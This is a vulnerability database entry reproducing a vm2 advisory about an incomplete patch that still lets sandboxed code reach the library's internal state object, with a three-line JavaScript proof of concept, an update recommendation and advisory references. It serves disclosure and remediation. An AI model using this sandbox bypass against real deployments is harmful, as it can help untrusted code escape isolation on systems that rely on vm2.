logo

Database

Security controls bypass or absence In vm2

Description

vm2 has access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL

Summary

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

Details

It is still possible to get access to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL.

PoC

const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
 globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
`));

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version
Patched versions

Aliases

1. GHSA-2cm2-m3w5-gp2f2. GCVE-GHSA-2cm2-m3w5-gp2f

References

1. https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f2. https://github.com/patriksimek/vm2/releases/tag/v3.11.2

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.

FLAT-1DBLY – Vulnerability | Fluid Attacks Database